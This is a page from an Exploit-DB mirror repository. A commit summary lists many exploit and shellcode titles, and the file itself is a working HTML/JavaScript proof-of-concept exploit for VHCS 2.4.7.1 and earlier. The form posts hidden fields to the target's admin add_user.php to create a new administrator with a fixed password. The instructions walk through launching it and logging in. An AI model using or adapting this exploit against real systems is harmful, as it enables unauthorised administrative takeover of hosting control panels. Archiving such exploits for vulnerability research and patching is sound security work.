bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/27205.html
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

88 lines
No EOL
3.2 KiB
HTML
Raw Blame History

source: https://www.securityfocus.com/bid/16600/info
Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities.
VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible.
<html>
<head>
<title>VHCS (version <= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit, script-kiddie!');
exit();
}
document.admin_add_user.action=document.admin_add_user.target.value;
document.admin_add_user.submit();
}
</script>
</head>
<body>
<hr>
<center>
<b>VHCS (version <= 2.4.7.1) PoC. &nbsp;By RoMaNSoFt &#60roman&#64rs-labs.com&#62 &nbsp;[08.Feb.2006]</b>
</center>
<hr>
<form name="admin_add_user" method="post" action="">
<table width="100%" cellpadding="5" cellspacing="5">
<tr>
<td width="20">&nbsp;</td>
<td colspan="2">
&nbsp;
</td>
</tr>
<tr>
<td width="20">&nbsp;</td> <td width="200">Target URL</td>
<td>
<input type="text" name="target" value="http://<target>/vhcs2/admin/add_user.php" style="width:400px">
</td>
</tr>
<tr>
<td width="20">&nbsp;</td> <td width="200">Username</td>
<td>
<input type="text" name="username" value="admin" style="width:200px">&nbsp;(should NOT exist)
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td colspan="2"><a href="javascript: submitform()">Exploit it!</a></td>
</tr>
<tr>
<td colspan="3">&nbsp;
</td>
</tr>
</table>
<input type="hidden" name="pass" value="dsrrocks">
<input type="hidden" name="pass_rep" value="dsrrocks">
<input type="hidden" name="email" value="vhcs-exploit@rs-labs.com">
<input type="hidden" name="uaction" value="add_user">
</form>
<hr>
<br>
<u>Quick instructions</u>.-<br>
<br>
1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace &#60target&#62 string) and username.<br>
2.- Remember not to use a probably existing username (such as "admin").<br>
3.- Launch the exploit. <i>If target system is vulnerable, a new VHCS admin user will be created</i> ;-)<br>
4.- You will be redirected to VHCS login page. Try to login with your brand new username.<br>
5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br>
<br>
<u>More info (analysis, fix, etc)</u>.-<br>
<br>
See <a href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i></a>.<br>
<br>
<hr>
</body>
</html>
Reference in a new issue View git blame Copy permalink